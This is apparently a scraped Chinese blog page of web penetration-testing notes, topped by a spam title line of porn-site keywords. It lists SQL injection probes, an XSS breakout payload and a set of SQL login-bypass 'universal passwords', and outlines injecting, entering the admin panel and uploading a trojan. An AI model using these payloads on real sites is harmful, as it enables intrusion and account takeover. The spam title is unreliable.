压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

入侵思路入侵思路

  1.WVS掃描器

  2.目錄掃描器

  3.nmap掃端口

  google黑客

  site:網站域名  inurl:admin

  鏈接是否有id傳值:要嘗試 sql注入和傳參

  SQL注入

  如果是整數:

 ???id=79-0

  ?id=79-1

  超過7位的數字,一般都是字符

  如果是參數:

  ?id=abc'%2b'

 ???id=abc'%2b'a

  搜索型方法

  2011%' and '%'='       實際情況<%2011% and '%'='%'>

  2011%' and '%'='a

  跨站:測試雙引號是否被過濾

  "121

  查看源代碼是否有"返,121數字是為了方便在源代碼中查找。

  如果尖括號被屏蔽可以嘗試

  " onkeyup=alert(/xss/);b="

  然后輸入a  看是否有彈出

  JS交互沒有SQL注入 嘗試XSS

  網站后臺

  弱密碼

  萬能密碼

  最短的:‘or’1

  'or'='or'

  1'or'1'='1–

  'or''='

  "or=or"

  'or''=''or''='

  'or'='or'

  'or'='1'

  'or' '1'='1'

  or 'a'='a'

  'or'a'='a–

  'or'='or'

  經驗證,'or''=''or''='的效果是最好的!

  暴力破解

  SQL注入

  找回密碼功能,查看是否將不同的用戶修改密碼發送到不同人的地址

  登陸成功的情況下查看cookie 是否有防護

  后臺目錄掃描工具:

  1.后臺登陸地址

  2.編輯器

  3.找木馬

  nmap:

  旁站

  常規思路 注入拿到管理密碼,登陸后臺,上傳木馬

  SQL注入另類應用:差異備份

  常見漏洞

  間接信任攻擊:CSRF URL重定向

  dump的東西    文件包含  路徑遍歷

  滲透用 WVS

  安全檢測 appscan

  上傳 CSRF 模塊 不安全對象引用是掃不出來的

  1.SQL注入

  2.XSS

  3.上傳 前端上傳 后端上傳

  4.CSRF(是在后臺登陸的情況下) 資料修改 發布留言 只要可以破壞別人東西的都屬于CSRF 如果存在驗證碼就不用猜了

  CSRF防護有兩種 驗證碼和token  可以截包后刪除token看是否還可以修改用。

  漏洞證明過程

  漏洞的修復建議

  5.命令執行漏洞

  截包看命令

  struts 2  存在于Java環境

  tomecat

  cgi漏洞   存在于php環境

  6. 不安全對象引用

  7.URL重定向

  8.文件包含  目錄遍歷

  9.模塊缺陷 –屬于權限繞過的漏洞 (如忘記密碼, 校驗碼什么的  文章編輯)

  判斷模塊

  10 目錄瀏覽  本來應該是403的成了200 例如 http://xxx.com/admin 列出相關信息

 

上一篇:安卓防火墻 PS DroidWall

下一篇:配置iptables防火墻(二)